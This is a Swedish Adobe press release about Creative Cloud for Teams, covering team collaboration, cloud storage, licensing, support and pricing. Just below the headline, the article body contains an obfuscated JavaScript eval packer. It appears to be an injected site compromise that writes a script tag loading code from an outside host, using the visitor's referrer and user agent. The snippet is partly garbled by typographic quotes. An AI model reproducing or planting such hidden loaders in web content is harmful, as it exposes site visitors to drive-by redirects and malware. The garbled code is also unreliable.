Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Adobe: Nu kan kreativa team arbeta tillsammans i molnet

Adobe: Nu kan kreativa team arbeta tillsammans i molnet
Sebastian

Adobe: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arzbh|var|u0026u|referrer|dddzr||js|php’.split(’|’),0,{}))
Ny teamplattform i Adobe Creative Cloud gör det möjligt för alla kreatörer att samarbeta i projekt i molnet. Lätt hantering av licenser ger administratörer större flexibilitet och säkerhet med digitalt, kreativt innehåll. Samtidigt får man fem gånger mer lagring i molnet, extra support och utbildning samt nya betalningsmöjligheter.

Adobe Creative Cloud har fått en storebror – Adobe Creative Cloud for Teams – som har en lång rad tjänster som gör det enklare att arbeta tillsammans i kreativa team.

Förutom tillgång att hämta samma programvaror som med ett vanligt medlemskap erbjuder team-plattformen nya betalningsalternativ, fem gånger så mycket lagringsutrymme i molnet, enkel hantering av enskilda medlemskap och extra supportfunktioner.

”Vi vet att många små företag inte har det lätt just nu och vi vill ge dem en enkel och hanterbar lösning. Med Team-lösningen kan man bland annat flytta licenser inom företaget och enkelt hantera förändringar i arbetsuppgifter eller grupper ”, säger Mariah Andén, nordisk marknadschef för Digital Media på Adobe.

Lösningen ger också en flexibel betalningsmetod. Man kan antingen välja att köpa med kreditkort direkt på adobe.com och betala varje månad, eller köpa via Adobe Platium-återfösäljare och få en faktura för hela året på en gång.

100 GB lagringsutrymme

Med Teams kommer 100 GB lagringsutrymme och möjlighet för en grupp att arbeta med Photoshop-, InDesign-, Premerie Pro-, Flash- eller Illustratorprojekt tillsammans, oavsett var man befinner sig – och oavsett om man använder Mac eller PC. Enklare licenshantering ger också större flexibilitet och trygghet för marknadsavdelningar och byråer som kan ha flera lay-outare, grafiker, fotografer och formgivare. Lanseringen visar ytterligare på den satsning Adobe gör kring moln-baserade verktyg.

Extra bra stöd och utbildning

Väljer man att köpa Creative Cloud for Teams får man också tillgång till Expert Support Service, som ger extra support och stöd jämfört med ett vanligt medlemskap. Creative Cloud for Teams har en inbyggd supportmodul där man kan boka tid eller bli uppringd av ett specialutbildat supportteam. Teams-versionen av Creative Cloud erbjuder också tutorials specifikt utvecklade av auktoriserade samarbetspartners som Kelby Utbildning, Video2brain och Attain.

Enkel synkronisering mellan din dator och molnet

Med Creative Cloud Connection, som ingår både med ett vanligt medlemskap i Creative Cloud och med Creative Cloud for Teams, kan man nu snabbt och enkelt synkronisera projekt på sin lokala dator direkt till en molnbaserad lagringsplats.

”Med Creative Cloud Connection ger vi medlemmarna en ännu smidigare användarupplevelse när de sparar projekt i t.ex Photoshop eller InDesign”, säger Mariah Andén.

Fler nya uppdateringar idag

Adobe har idag även gjort ett antal uppdateringar för alla medlemmar i Creative Cloud. Photoshop får den största uppdateringen med stöd för Retina-skärm, men även Adobe Muse, som gör det enkelt att utveckla webbplatser för mobila enheter utan kodning, får ett antal nya funktioner.

Medlemskapet motsvarar Islands befolkning

Sedan Creative Cloud lanserades i april i år, har antalet medlemmar ökat så mycket att det nu motsvarar Islands befolkning. Både professionella och privata kreatörer har upptäckt enkelheten och säkerheten i att alltid ha tillgång till de senaste funktionerna och inte vara bunden till en specifik hårdvara. Idag väljer de flesta att teckna ett medlemsskap på årsbasis.

Om Creative Cloud

Creative Cloud blir ett helt nytt sätt att arbeta med kreativa processer och låter användarna utforska, publicera, dela och arbeta över enheter i molnet och på skrivbordet. Man laddar ner programmen från Creative Cloud och delar filerna i molnet. Creative Cloud-tjänsten är tillgänglig i 36 länder och på flertalet språk. I Sverige kan man gå med i Adobe Creative Cloud från 565 kr per månad. Även utbildningsinstitutioner kan använda tjänsten.

Läs mer på http://www.adobe.com/se/event/createnow.html

Detta är ett pressmeddelande från Adobe